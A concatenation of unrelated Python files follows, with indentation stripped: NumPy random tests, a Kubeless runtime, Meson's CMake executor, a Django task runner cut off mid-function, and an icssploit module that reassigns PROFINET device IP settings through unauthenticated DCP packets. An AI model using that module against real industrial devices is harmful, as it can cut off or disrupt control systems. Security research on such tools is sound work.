desired = np.array([0.67884390500697, 2.21653186290321, 1.01990310084276])
random = Generator(MT19937(self.seed))
lognormal = random.lognormal
actual = lognormal(mean * 3, sigma)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, lognormal, mean * 3, bad_sigma)
random = Generator(MT19937(self.seed))
actual = random.lognormal(mean, sigma * 3)
assert_raises(ValueError, random.lognormal, mean, bad_sigma * 3)
def test_rayleigh(self):
scale = [1]
bad_scale = [-1]
desired = np.array([0.60439534475066, 0.66120048396359, 1.67873398389499])
random = Generator(MT19937(self.seed))
actual = random.rayleigh(scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, random.rayleigh, bad_scale * 3)
def test_wald(self):
mean = [0.5]
scale = [1]
bad_mean = [0]
bad_scale = [-2]
desired = np.array([0.38052407392905, 0.50701641508592, 0.484935249864])
random = Generator(MT19937(self.seed))
actual = random.wald(mean * 3, scale)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, random.wald, bad_mean * 3, scale)
assert_raises(ValueError, random.wald, mean * 3, bad_scale)
random = Generator(MT19937(self.seed))
actual = random.wald(mean, scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, random.wald, bad_mean, scale * 3)
assert_raises(ValueError, random.wald, mean, bad_scale * 3)
def test_triangular(self):
left = [1]
right = [3]
mode = [2]
bad_left_one = [3]
bad_mode_one = [4]
bad_left_two, bad_mode_two = right * 2
desired = np.array([1.57781954604754, 1.62665986867957, 2.30090130831326])
random = Generator(MT19937(self.seed))
triangular = random.triangular
actual = triangular(left * 3, mode, right)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, triangular, bad_left_one * 3, mode, right)
assert_raises(ValueError, triangular, left * 3, bad_mode_one, right)
assert_raises(ValueError, triangular, bad_left_two * 3, bad_mode_two,
right)
random = Generator(MT19937(self.seed))
triangular = random.triangular
actual = triangular(left, mode * 3, right)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, triangular, bad_left_one, mode * 3, right)
assert_raises(ValueError, triangular, left, bad_mode_one * 3, right)
assert_raises(ValueError, triangular, bad_left_two, bad_mode_two * 3,
right)
random = Generator(MT19937(self.seed))
triangular = random.triangular
actual = triangular(left, mode, right * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, triangular, bad_left_one, mode, right * 3)
assert_raises(ValueError, triangular, left, bad_mode_one, right * 3)
assert_raises(ValueError, triangular, bad_left_two, bad_mode_two,
right * 3)
assert_raises(ValueError, triangular, 10., 0., 20.)
assert_raises(ValueError, triangular, 10., 25., 20.)
assert_raises(ValueError, triangular, 10., 10., 10.)
def test_binomial(self):
n = [1]
p = [0.5]
bad_n = [-1]
bad_p_one = [-1]
bad_p_two = [1.5]
desired = np.array([0, 0, 1])
random = Generator(MT19937(self.seed))
binom = random.binomial
actual = binom(n * 3, p)
assert_array_equal(actual, desired)
assert_raises(ValueError, binom, bad_n * 3, p)
assert_raises(ValueError, binom, n * 3, bad_p_one)
assert_raises(ValueError, binom, n * 3, bad_p_two)
random = Generator(MT19937(self.seed))
actual = random.binomial(n, p * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, binom, bad_n, p * 3)
assert_raises(ValueError, binom, n, bad_p_one * 3)
assert_raises(ValueError, binom, n, bad_p_two * 3)
def test_negative_binomial(self):
n = [1]
p = [0.5]
bad_n = [-1]
bad_p_one = [-1]
bad_p_two = [1.5]
desired = np.array([0, 2, 1], dtype=np.int64)
random = Generator(MT19937(self.seed))
neg_binom = random.negative_binomial
actual = neg_binom(n * 3, p)
assert_array_equal(actual, desired)
assert_raises(ValueError, neg_binom, bad_n * 3, p)
assert_raises(ValueError, neg_binom, n * 3, bad_p_one)
assert_raises(ValueError, neg_binom, n * 3, bad_p_two)
random = Generator(MT19937(self.seed))
neg_binom = random.negative_binomial
actual = neg_binom(n, p * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, neg_binom, bad_n, p * 3)
assert_raises(ValueError, neg_binom, n, bad_p_one * 3)
assert_raises(ValueError, neg_binom, n, bad_p_two * 3)
def test_poisson(self):
lam = [1]
bad_lam_one = [-1]
desired = np.array([0, 0, 3])
random = Generator(MT19937(self.seed))
max_lam = random._poisson_lam_max
bad_lam_two = [max_lam * 2]
poisson = random.poisson
actual = poisson(lam * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, poisson, bad_lam_one * 3)
assert_raises(ValueError, poisson, bad_lam_two * 3)
def test_zipf(self):
a = [2]
bad_a = [0]
desired = np.array([1, 8, 1])
random = Generator(MT19937(self.seed))
zipf = random.zipf
actual = zipf(a * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, zipf, bad_a * 3)
with np.errstate(invalid='ignore'):
assert_raises(ValueError, zipf, np.nan)
assert_raises(ValueError, zipf, [0, 0, np.nan])
def test_geometric(self):
p = [0.5]
bad_p_one = [-1]
bad_p_two = [1.5]
desired = np.array([1, 1, 3])
random = Generator(MT19937(self.seed))
geometric = random.geometric
actual = geometric(p * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, geometric, bad_p_one * 3)
assert_raises(ValueError, geometric, bad_p_two * 3)
def test_hypergeometric(self):
ngood = [1]
nbad = [2]
nsample = [2]
bad_ngood = [-1]
bad_nbad = [-2]
bad_nsample_one = [-1]
bad_nsample_two = [4]
desired = np.array([0, 0, 1])
random = Generator(MT19937(self.seed))
actual = random.hypergeometric(ngood * 3, nbad, nsample)
assert_array_equal(actual, desired)
assert_raises(ValueError, random.hypergeometric, bad_ngood * 3, nbad, nsample)
assert_raises(ValueError, random.hypergeometric, ngood * 3, bad_nbad, nsample)
assert_raises(ValueError, random.hypergeometric, ngood * 3, nbad, bad_nsample_one)
assert_raises(ValueError, random.hypergeometric, ngood * 3, nbad, bad_nsample_two)
random = Generator(MT19937(self.seed))
actual = random.hypergeometric(ngood, nbad * 3, nsample)
assert_array_equal(actual, desired)
assert_raises(ValueError, random.hypergeometric, bad_ngood, nbad * 3, nsample)
assert_raises(ValueError, random.hypergeometric, ngood, bad_nbad * 3, nsample)
assert_raises(ValueError, random.hypergeometric, ngood, nbad * 3, bad_nsample_one)
assert_raises(ValueError, random.hypergeometric, ngood, nbad * 3, bad_nsample_two)
random = Generator(MT19937(self.seed))
hypergeom = random.hypergeometric
actual = hypergeom(ngood, nbad, nsample * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, hypergeom, bad_ngood, nbad, nsample * 3)
assert_raises(ValueError, hypergeom, ngood, bad_nbad, nsample * 3)
assert_raises(ValueError, hypergeom, ngood, nbad, bad_nsample_one * 3)
assert_raises(ValueError, hypergeom, ngood, nbad, bad_nsample_two * 3)
assert_raises(ValueError, hypergeom, -1, 10, 20)
assert_raises(ValueError, hypergeom, 10, -1, 20)
assert_raises(ValueError, hypergeom, 10, 10, -1)
assert_raises(ValueError, hypergeom, 10, 10, 25)
# ValueError for arguments that are too big.
assert_raises(ValueError, hypergeom, 2**30, 10, 20)
assert_raises(ValueError, hypergeom, 999, 2**31, 50)
assert_raises(ValueError, hypergeom, 999, [2**29, 2**30], 1000)
def test_logseries(self):
p = [0.5]
bad_p_one = [2]
bad_p_two = [-1]
desired = np.array([1, 1, 1])
random = Generator(MT19937(self.seed))
logseries = random.logseries
actual = logseries(p * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, logseries, bad_p_one * 3)
assert_raises(ValueError, logseries, bad_p_two * 3)
def test_multinomial(self):
random = Generator(MT19937(self.seed))
actual = random.multinomial([5, 20], [1 / 6.] * 6, size=(3, 2))
desired = np.array([[[0, 0, 2, 1, 2, 0],
[2, 3, 6, 4, 2, 3]],
[[1, 0, 1, 0, 2, 1],
[7, 2, 2, 1, 4, 4]],
[[0, 2, 0, 1, 2, 0],
[3, 2, 3, 3, 4, 5]]], dtype=np.int64)
assert_array_equal(actual, desired)
random = Generator(MT19937(self.seed))
actual = random.multinomial([5, 20], [1 / 6.] * 6)
desired = np.array([[0, 0, 2, 1, 2, 0],
[2, 3, 6, 4, 2, 3]], dtype=np.int64)
assert_array_equal(actual, desired)
class TestThread:
# make sure each state produces the same sequence even in threads
def setup(self):
self.seeds = range(4)
def check_function(self, function, sz):
from threading import Thread
out1 = np.empty((len(self.seeds),) + sz)
out2 = np.empty((len(self.seeds),) + sz)
# threaded generation
t = [Thread(target=function, args=(Generator(MT19937(s)), o))
for s, o in zip(self.seeds, out1)]
[x.start() for x in t]
[x.join() for x in t]
# the same serial
for s, o in zip(self.seeds, out2):
function(Generator(MT19937(s)), o)
# these platforms change x87 fpu precision mode in threads
if np.intp().dtype.itemsize == 4 and sys.platform == "win32":
assert_array_almost_equal(out1, out2)
else:
assert_array_equal(out1, out2)
def test_normal(self):
def gen_random(state, out):
out[...] = state.normal(size=10000)
self.check_function(gen_random, sz=(10000,))
def test_exp(self):
def gen_random(state, out):
out[...] = state.exponential(scale=np.ones((100, 1000)))
self.check_function(gen_random, sz=(100, 1000))
def test_multinomial(self):
def gen_random(state, out):
out[...] = state.multinomial(10, [1 / 6.] * 6, size=10000)
self.check_function(gen_random, sz=(10000, 6))
# See Issue #4263
class TestSingleEltArrayInput:
def setup(self):
self.argOne = np.array([2])
self.argTwo = np.array([3])
self.argThree = np.array([4])
self.tgtShape = (1,)
def test_one_arg_funcs(self):
funcs = (random.exponential, random.standard_gamma,
random.chisquare, random.standard_t,
random.pareto, random.weibull,
random.power, random.rayleigh,
random.poisson, random.zipf,
random.geometric, random.logseries)
probfuncs = (random.geometric, random.logseries)
for func in funcs:
if func in probfuncs: # p < 1.0
out = func(np.array([0.5]))
else:
out = func(self.argOne)
assert_equal(out.shape, self.tgtShape)
def test_two_arg_funcs(self):
funcs = (random.uniform, random.normal,
random.beta, random.gamma,
random.f, random.noncentral_chisquare,
random.vonmises, random.laplace,
random.gumbel, random.logistic,
random.lognormal, random.wald,
random.binomial, random.negative_binomial)
probfuncs = (random.binomial, random.negative_binomial)
for func in funcs:
if func in probfuncs: # p <= 1
argTwo = np.array([0.5])
else:
argTwo = self.argTwo
out = func(self.argOne, argTwo)
assert_equal(out.shape, self.tgtShape)
out = func(self.argOne[0], argTwo)
assert_equal(out.shape, self.tgtShape)
out = func(self.argOne, argTwo[0])
assert_equal(out.shape, self.tgtShape)
def test_integers(self, endpoint):
itype = [np.bool_, np.int8, np.uint8, np.int16, np.uint16,
np.int32, np.uint32, np.int64, np.uint64]
func = random.integers
high = np.array([1])
low = np.array([0])
for dt in itype:
out = func(low, high, endpoint=endpoint, dtype=dt)
assert_equal(out.shape, self.tgtShape)
out = func(low[0], high, endpoint=endpoint, dtype=dt)
assert_equal(out.shape, self.tgtShape)
out = func(low, high[0], endpoint=endpoint, dtype=dt)
assert_equal(out.shape, self.tgtShape)
def test_three_arg_funcs(self):
funcs = [random.noncentral_f, random.triangular,
random.hypergeometric]
for func in funcs:
out = func(self.argOne, self.argTwo, self.argThree)
assert_equal(out.shape, self.tgtShape)
out = func(self.argOne[0], self.argTwo, self.argThree)
assert_equal(out.shape, self.tgtShape)
out = func(self.argOne, self.argTwo[0], self.argThree)
assert_equal(out.shape, self.tgtShape)
|
_kubeless.py | #!/usr/bin/env python
import importlib
import io
import os
import queue
import sys
import bottle
import prometheus_client as prom
# The reason this file has an underscore prefix in its name is to avoid a
# name collision with the user-defined module.
current_mod = os.path.basename(__file__).split('.')[0]
if os.getenv('MOD_NAME') == current_mod:
raise ValueError(f'Module cannot be named {current_mod}')
sys.path.append('/kubeless')
mod = importlib.import_module(os.getenv('MOD_NAME'))
func = getattr(mod, os.getenv('FUNC_HANDLER'))
func_port = os.getenv('FUNC_PORT', 8080)
timeout = float(os.getenv('FUNC_TIMEOUT', 180))
memfile_max = int(os.getenv('FUNC_MEMFILE_MAX', 100*1024*1024))
bottle.BaseRequest.MEMFILE_MAX = memfile_max
app = application = bottle.app()
function_context = {
'function-name': func.__name__,
'timeout': timeout,
'runtime': os.getenv('FUNC_RUNTIME'),
'memory-limit': os.getenv('FUNC_MEMORY_LIMIT'),
}
class PicklableBottleRequest(bottle.BaseRequest):
'''Bottle request that can be pickled (serialized).
`bottle.BaseRequest` is not picklable and therefore cannot be passed directly to a
python multiprocessing `Process` when using the forkserver or spawn multiprocessing
contexts. So, we selectively delete components that are not picklable.
'''
def __init__(self, data, *args, **kwargs):
super().__init__(*args, **kwargs)
# Bottle uses either `io.BytesIO` or `tempfile.TemporaryFile` to store the
# request body depending on whether the length of the body is less than
# `MEMFILE_MAX` or not, but `tempfile.TemporaryFile` is not picklable.
# So, we override it to always store the body as `io.BytesIO`.
self.environ['bottle.request.body'] = io.BytesIO(data)
def __getstate__(self):
env = self.environ.copy()
# File-like objects are not picklable.
del env['wsgi.errors']
del env['wsgi.input']
# bottle.ConfigDict is not picklable because it contains a lambda function.
del env['bottle.app']
del env['bottle.route']
del env['route.handle']
return env
def __setstate__(self, env):
setattr(self, 'environ', env)
def funcWrap(q, event, c):
try:
q.put(func(event, c))
except Exception as inst:
q.put(inst)
@app.get('/healthz')
def healthz():
return 'OK'
@app.get('/metrics')
def metrics():
bottle.response.content_type = prom.CONTENT_TYPE_LATEST
return prom.generate_latest(prom.REGISTRY)
@app.route('/<:re:.*>', method=['GET', 'POST', 'PATCH', 'DELETE'])
def handler():
req = bottle.request
data = req.body.read()
picklable_req = PicklableBottleRequest(data, req.environ.copy())
if req.get_header('content-type') == 'application/json':
data = req.json
event = {
'data': data,
'event-id': req.get_header('event-id'),
'event-type': req.get_header('event-type'),
'event-time': req.get_header('event-time'),
'event-namespace': req.get_header('event-namespace'),
'extensions': {'request': picklable_req}
}
method = req.method
func_calls.labels(method).inc()
with func_errors.labels(method).count_exceptions():
with func_hist.labels(method).time():
q = ctx.Queue()
p = ctx.Process(target=funcWrap, args=(q, event, function_context))
p.start()
try:
res = q.get(block=True, timeout=timeout)
except queue.Empty:
p.terminate()
p.join()
return bottle.HTTPError(408, "Timeout while processing the function")
else:
p.join()
if isinstance(res, Exception) and not isinstance(res, bottle.HTTPResponse):
logging.error("Function returned an exception: %s", res)
raise res
return res
def preload():
"""This is a no-op function used to start the forkserver."""
pass
if __name__ == '__main__':
import logging
import multiprocessing as mp
import requestlogger
mp_context = os.getenv('MP_CONTEXT', 'forkserver')
if mp_context == "fork":
raise ValueError(
'"fork" multiprocessing context is not supported because cherrypy is a '
'multithreaded server and safely forking a multithreaded process is '
'problematic'
)
if mp_context not in ["forkserver", "spawn"]:
raise ValueError(
f'"{mp_context}" is an invalid multiprocessing context. Possible values '
'are "forkserver" and "spawn"'
)
try:
ctx = mp.get_context(mp_context)
if ctx.get_start_method() == 'forkserver':
# Preload the current module and consequently also the user-defined module
# so that all the child processes forked from the forkserver in response to
# a request immediately have access to the global data in the user-defined
# module without having to load it for every request.
ctx.set_forkserver_preload([current_mod])
# Start the forkserver before we start accepting requests.
d = ctx.Process(target=preload)
d.start()
d.join()
except ValueError:
# Default to 'spawn' if 'forkserver' is unavailable.
ctx = mp.get_context('spawn')
logging.warn(
f'"{mp_context}" multiprocessing context is unavailable. Using "spawn"'
)
func_hist = prom.Histogram(
'function_duration_seconds', 'Duration of user function in seconds', ['method']
)
func_calls = prom.Counter(
'function_calls_total', 'Number of calls to user function', ['method']
)
func_errors = prom.Counter(
'function_failures_total', 'Number of exceptions in user function', ['method']
)
loggedapp = requestlogger.WSGILogger(
app,
[logging.StreamHandler(stream=sys.stdout)],
requestlogger.ApacheFormatter(),
)
bottle.run(
loggedapp,
server='cherrypy',
host='0.0.0.0',
port=func_port,
# Number of requests that can be handled in parallel (default = 30).
numthreads=os.getenv('CHERRYPY_NUMTHREADS', 30),
)
|
executor.py | # Copyright 2019 The Meson development team
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# This class contains the basic functionality needed to run any interpreter
# or an interpreter-based tool.
import subprocess as S
from pathlib import Path
from threading import Thread
import typing as T
import re
import os
from .. import mlog
from ..mesonlib import PerMachine, Popen_safe, version_compare, MachineChoice, is_windows, OptionKey
if T.TYPE_CHECKING:
from ..environment import Environment
from ..dependencies.base import ExternalProgram
from ..compilers import Compiler
TYPE_result = T.Tuple[int, T.Optional[str], T.Optional[str]]
TYPE_cache_key = T.Tuple[str, T.Tuple[str, ...], str, T.FrozenSet[T.Tuple[str, str]]]
class CMakeExecutor:
# The class's copy of the CMake path. Avoids having to search for it
# multiple times in the same Meson invocation.
class_cmakebin = PerMachine(None, None) # type: PerMachine[T.Optional[ExternalProgram]]
class_cmakevers = PerMachine(None, None) # type: PerMachine[T.Optional[str]]
class_cmake_cache = {} # type: T.Dict[T.Any, TYPE_result]
def __init__(self, environment: 'Environment', version: str, for_machine: MachineChoice, silent: bool = False):
self.min_version = version
self.environment = environment
self.for_machine = for_machine
self.cmakebin, self.cmakevers = self.find_cmake_binary(self.environment, silent=silent)
self.always_capture_stderr = True
self.print_cmout = False
self.prefix_paths = [] # type: T.List[str]
self.extra_cmake_args = [] # type: T.List[str]
if self.cmakebin is None:
return
if not version_compare(self.cmakevers, self.min_version):
mlog.warning(
'The version of CMake', mlog.bold(self.cmakebin.get_path()),
'is', mlog.bold(self.cmakevers), 'but version', mlog.bold(self.min_version),
'is required')
self.cmakebin = None
return
self.prefix_paths = self.environment.coredata.options[OptionKey('cmake_prefix_path', machine=self.for_machine)].value
if self.prefix_paths:
self.extra_cmake_args += ['-DCMAKE_PREFIX_PATH={}'.format(';'.join(self.prefix_paths))]
def find_cmake_binary(self, environment: 'Environment', silent: bool = False) -> T.Tuple[T.Optional['ExternalProgram'], T.Optional[str]]:
from ..dependencies.base import find_external_program, NonExistingExternalProgram
# Only search for CMake the first time and store the result in the class
# definition
if isinstance(CMakeExecutor.class_cmakebin[self.for_machine], NonExistingExternalProgram):
mlog.debug('CMake binary for %s is cached as not found' % self.for_machine)
return None, None
elif CMakeExecutor.class_cmakebin[self.for_machine] is not None:
mlog.debug('CMake binary for %s is cached.' % self.for_machine)
else:
assert CMakeExecutor.class_cmakebin[self.for_machine] is None
mlog.debug('CMake binary for %s is not cached' % self.for_machine)
for potential_cmakebin in find_external_program(
environment, self.for_machine, 'cmake', 'CMake',
environment.default_cmake, allow_default_for_cross=False):
version_if_ok = self.check_cmake(potential_cmakebin)
if not version_if_ok:
continue
if not silent:
mlog.log('Found CMake:', mlog.bold(potential_cmakebin.get_path()),
'({})'.format(version_if_ok))
CMakeExecutor.class_cmakebin[self.for_machine] = potential_cmakebin
CMakeExecutor.class_cmakevers[self.for_machine] = version_if_ok
break
else:
if not silent:
mlog.log('Found CMake:', mlog.red('NO'))
# Set to False instead of None to signify that we've already
# searched for it and not found it
CMakeExecutor.class_cmakebin[self.for_machine] = NonExistingExternalProgram()
CMakeExecutor.class_cmakevers[self.for_machine] = None
return None, None
return CMakeExecutor.class_cmakebin[self.for_machine], CMakeExecutor.class_cmakevers[self.for_machine]
def check_cmake(self, cmakebin: 'ExternalProgram') -> T.Optional[str]:
if not cmakebin.found():
mlog.log('Did not find CMake {!r}'.format(cmakebin.name))
return None
try:
p, out = Popen_safe(cmakebin.get_command() + ['--version'])[0:2]
if p.returncode != 0:
mlog.warning('Found CMake {!r} but couldn\'t run it'
''.format(' '.join(cmakebin.get_command())))
return None
except FileNotFoundError:
mlog.warning('We thought we found CMake {!r} but now it\'s not there. How odd!'
''.format(' '.join(cmakebin.get_command())))
return None
except PermissionError:
msg = 'Found CMake {!r} but didn\'t have permissions to run it.'.format(' '.join(cmakebin.get_command()))
if not is_windows():
msg += '\n\nOn Unix-like systems this is often caused by scripts that are not executable.'
mlog.warning(msg)
return None
cmvers = re.search(r'(cmake|cmake3)\s*version\s*([\d.]+)', out).group(2)
return cmvers
def set_exec_mode(self, print_cmout: T.Optional[bool] = None, always_capture_stderr: T.Optional[bool] = None) -> None:
if print_cmout is not None:
self.print_cmout = print_cmout
if always_capture_stderr is not None:
self.always_capture_stderr = always_capture_stderr
def _cache_key(self, args: T.List[str], build_dir: Path, env: T.Optional[T.Dict[str, str]]) -> TYPE_cache_key:
fenv = frozenset(env.items()) if env is not None else frozenset()
targs = tuple(args)
return (self.cmakebin.get_path(), targs, build_dir.as_posix(), fenv)
def _call_cmout_stderr(self, args: T.List[str], build_dir: Path, env: T.Optional[T.Dict[str, str]]) -> TYPE_result:
cmd = self.cmakebin.get_command() + args
proc = S.Popen(cmd, stdout=S.PIPE, stderr=S.PIPE, cwd=str(build_dir), env=env) # TODO [PYTHON_37]: drop Path conversion
# stdout and stderr MUST be read at the same time to avoid pipe
# blocking issues. The easiest way to do this is with a separate
# thread for one of the pipes.
def print_stdout() -> None:
while True:
line = proc.stdout.readline()
if not line:
break
mlog.log(line.decode(errors='ignore').strip('\n'))
proc.stdout.close()
t = Thread(target=print_stdout)
t.start()
try:
# Read stderr line by line and log non trace lines
raw_trace = ''
tline_start_reg = re.compile(r'^\s*(.*\.(cmake|txt))\(([0-9]+)\):\s*(\w+)\(.*$')
inside_multiline_trace = False
while True:
line_raw = proc.stderr.readline()
if not line_raw:
break
line = line_raw.decode(errors='ignore')
if tline_start_reg.match(line):
raw_trace += line
inside_multiline_trace = not line.endswith(' )\n')
elif inside_multiline_trace:
raw_trace += line
else:
mlog.warning(line.strip('\n'))
finally:
proc.stderr.close()
t.join()
proc.wait()
return proc.returncode, None, raw_trace
def _call_cmout(self, args: T.List[str], build_dir: Path, env: T.Optional[T.Dict[str, str]]) -> TYPE_result:
cmd = self.cmakebin.get_command() + args
proc = S.Popen(cmd, stdout=S.PIPE, stderr=S.STDOUT, cwd=str(build_dir), env=env) # TODO [PYTHON_37]: drop Path conversion
while True:
line = proc.stdout.readline()
if not line:
break
mlog.log(line.decode(errors='ignore').strip('\n'))
proc.stdout.close()
proc.wait()
return proc.returncode, None, None
def _call_quiet(self, args: T.List[str], build_dir: Path, env: T.Optional[T.Dict[str, str]]) -> TYPE_result:
build_dir.mkdir(parents=True, exist_ok=True)
cmd = self.cmakebin.get_command() + args
ret = S.run(cmd, env=env, cwd=str(build_dir), close_fds=False,
stdout=S.PIPE, stderr=S.PIPE, universal_newlines=False) # TODO [PYTHON_37]: drop Path conversion
rc = ret.returncode
out = ret.stdout.decode(errors='ignore')
err = ret.stderr.decode(errors='ignore')
return rc, out, err
def _call_impl(self, args: T.List[str], build_dir: Path, env: T.Optional[T.Dict[str, str]]) -> TYPE_result:
mlog.debug('Calling CMake ({}) in {} with:'.format(self.cmakebin.get_command(), build_dir))
for i in args:
mlog.debug(' - "{}"'.format(i))
if not self.print_cmout:
return self._call_quiet(args, build_dir, env)
else:
if self.always_capture_stderr:
return self._call_cmout_stderr(args, build_dir, env)
else:
return self._call_cmout(args, build_dir, env)
def call(self, args: T.List[str], build_dir: Path, env: T.Optional[T.Dict[str, str]] = None, disable_cache: bool = False) -> TYPE_result:
if env is None:
env = os.environ.copy()
args = args + self.extra_cmake_args
if disable_cache:
return self._call_impl(args, build_dir, env)
# First check if cached, if not call the real cmake function
cache = CMakeExecutor.class_cmake_cache
key = self._cache_key(args, build_dir, env)
if key not in cache:
cache[key] = self._call_impl(args, build_dir, env)
return cache[key]
def found(self) -> bool:
return self.cmakebin is not None
def version(self) -> str:
return self.cmakevers
def executable_path(self) -> str:
return self.cmakebin.get_path()
def get_command(self) -> T.List[str]:
return self.cmakebin.get_command()
def get_cmake_prefix_paths(self) -> T.List[str]:
return self.prefix_paths
def machine_choice(self) -> MachineChoice:
return self.for_machine
|
profinet_set_ip.py | from icssploit import (
exploits,
print_success,
print_status,
print_error,
validators,
)
import threading
from icssploit.thirdparty import tabulate
from icssploit.protocols.pn_dcp import *
from scapy.arch import get_if_hwaddr
from scapy.sendrecv import sendp, sniff
TABLE_HEADER = ['Device Name', 'Device Type', "MAC Address", "IP Address", "Netmask", "GateWay"]
PROFINET_BROADCAST_ADDRESS_1 = '01:0e:cf:00:00:00'
PROFINET_BROADCAST_ADDRESS_2 = "28:63:36:5a:18:f1"
PROFINET_DEVICES = []
class Exploit(exploits.Exploit):
__info__ = {
'name': 'profinet device ip setup',
'authors': [
'wenzhe zhu <jtrkid[at]gmail.com>' # icssploit module
],
'description': 'Setup target ip address with PROFINET-DCP protocol.',
'references': [
],
}
nic = exploits.Option('eth0', 'Interface Name e.g eth0, en0')
target = exploits.Option('40:6c:8f:ff:ff:ff', 'Target mac address, e.g. 40:6c:8f:ff:ff:ff',
validators=validators.mac)
target_ip = exploits.Option('192.168.1.100', 'IP Address to set', validators=validators.ipv4)
target_netmask = exploits.Option('255.255.255.0', 'Network mask to set', validators=validators.ipv4)
target_gateway = exploits.Option('0.0.0.0', 'Gateway to set', validators=validators.ipv4)
timeout = exploits.Option(3, 'Timeout for response', validators=validators.integer)
verbose = exploits.Option(0, 'Scapy verbose level, 0 to 2', validators=validators.integer)
sniff_mac_address = None
sniff_finished = threading.Event()
result = []
def sniff_answer(self):
self.sniff_finished.clear()
response = sniff(iface=self.nic, filter="ether dst host %s" % self.sniff_mac_address, timeout=self.timeout)
self.result = []
for i in range(len(response)):
pkt = response[i]
if pkt[Ether].dst == self.sniff_mac_address:
Device_Name = ''
Device_Type = ''
MAC_Address = pkt[Ether].src
IP_Address = ''
Netmask = ''
GateWay = ''
if pkt.haslayer(PNDCPIdentDeviceNameOfStationResponseBlock):
Device_Name = pkt[PNDCPIdentDeviceNameOfStationResponseBlock].NameOfStation
if pkt.haslayer(PNDCPIdentDeviceManufacturerSpecificResponseBlock):
Device_Type = pkt[PNDCPIdentDeviceManufacturerSpecificResponseBlock].DeviceVendorValue
if pkt.haslayer(PNDCPIdentIPParameterResponseBlock):
IP_Address = pkt[PNDCPIdentIPParameterResponseBlock].IPaddress
Netmask = pkt[PNDCPIdentIPParameterResponseBlock].Subnetmask
GateWay = pkt[PNDCPIdentIPParameterResponseBlock].StandardGateway
self.result.append([Device_Name, Device_Type, MAC_Address, IP_Address, Netmask, GateWay])
self.sniff_finished.set()
def exploit(self, target_mac):
packet = Ether(src=self.sniff_mac_address, dst=target_mac, type=0x8892) / \
ProfinetIO(frameID=0xFEFD) / PNDCPHeader(ServiceID=4, ServiceType=0,
DCPBlocks=[PNDCPSetRequest(Option=0x01, SubOption=0x02)])
packet[PNDCPHeader].DCPBlocks[0].DCPBlock = PNDCPSetIPParameterRequestBlock(
IPaddress=self.target_ip, Subnetmask=self.target_netmask, StandardGateway=self.target_gateway
)
sendp(packet, iface=self.nic)
def scan_target_ip(self, target_mac):
p = threading.Thread(target=self.sniff_answer)
p.setDaemon(True)
p.start()
packet = Ether(src=self.sniff_mac_address, dst=target_mac, type=0x8892) / ProfinetIO(frameID=0xFEFE) / \
PNDCPHeader(ServiceID=5, ServiceType=0, DCPBlocks=[PNDCPIdentRequest()])
sendp(packet, iface=self.nic)
self.sniff_finished.wait(self.timeout + 1)
unique_device = [list(x) for x in set(tuple(x) for x in self.result)]
print(tabulate.tabulate(unique_device, headers=TABLE_HEADER))
print('\n')
def run(self):
conf.verb = self.verbose
self.sniff_mac_address = get_if_hwaddr(self.nic)
self.scan_target_ip(self.target)
if len(self.result) == 0:
print_error("Didn't find any device, please check target mac address.")
return
print_status("Please make sure target device info is correct.")
print_status("Do you want setup target with\n ip address: %s\n network mask: %s\n gateway:%s\n" % (
self.target_ip, self.target_netmask, self.target_gateway
))
ans = raw_input("Y/y to confirm, other to cancel.\n:")
if ans.upper() == "Y":
self.exploit(target_mac=self.target)
self.scan_target_ip(self.target)
# TODO: need some other method to check setup is success or not.
if len(self.result) == 0:
print_error("Setup target ip failed.")
return
if self.result[0][3] != self.target_ip \
or self.result[0][4] != self.target_netmask \
or self.result[0][5] != self.target_gateway:
print_error("Setup target ip failed.")
return
else:
print_success("Setup target ip succeeded")
|
fulcrum_task_runner.py | from __future__ import absolute_import
from hashlib import md5
from django.core.cache import cache
from multiprocessing import Process
import time
import django
from django.core.exceptions import AppRegistryNotReady, ImproperlyConfigured
from django.db import OperationalError
import json
class FulcrumTaskRunner:
def __init__(self):
name = "FulcrumTasks"
file_name_hexdigest = md5(name).hexdigest()
self.lock_id = '{0}-lock-{1}'.format(name, file_name_hexdigest)
def start(self, interval=30):
"""Calls Run() sets an interval time
Args:
interval: An integer in seconds for the polling interval.
"""
if self.add_lock():
process = Process(target=self.run, args=(interval,))
process.daemon = True
process.start()
def run(self, interval):
"""Checks the 'lock' from the cache if using multiprocessing module, update if it exists.
Args:
interval: An integer in seconds for the polling interval.
"""
while self.is_locked():
try:
from .tasks import task_update_layers, pull_s3_data
except AppRegistryNotReady:
django.setup()
from .tasks import task_update_layers, pull_s3_data
try:
try:
from django.contrib.auth.models import User
except ImproperlyConfigured:
pass
if User.objects.filter(id=1):
print("Updating Layers...")
task_update_layers()
print("Pulling S3 Data...")
pull_s3_data()
except OperationalError as e:
print("Database isn't ready yet.")
print(e.message)
print(e.args)
time.sleep(interval)
def stop(self):
"""Removes the 'lock' from the cache if using multiprocessing module."""
cache.delete(self.lock_id)
def add_lock(self):
"""Adds a lock to a queue so multiple processes don't break the lock."""
if cache.add(self.lock_id, json.dumps(['lock']), timeout=None):
return True
else:
old_value = json.loads(cache.get(self.lock_id))
cache.set(self.lock_id, json.dumps(old_value + ['lock']))
return False
def is_locked(self):
"""Checks the lock."""
if cache.get(self.lock_id):
return True
return False
def remove_lock(self):
"""Removes a lock to a queue so multiple processes don't break the lock."""
lock = json.loads(cache.get(self.lock_id))
if len(lock) <= 1:
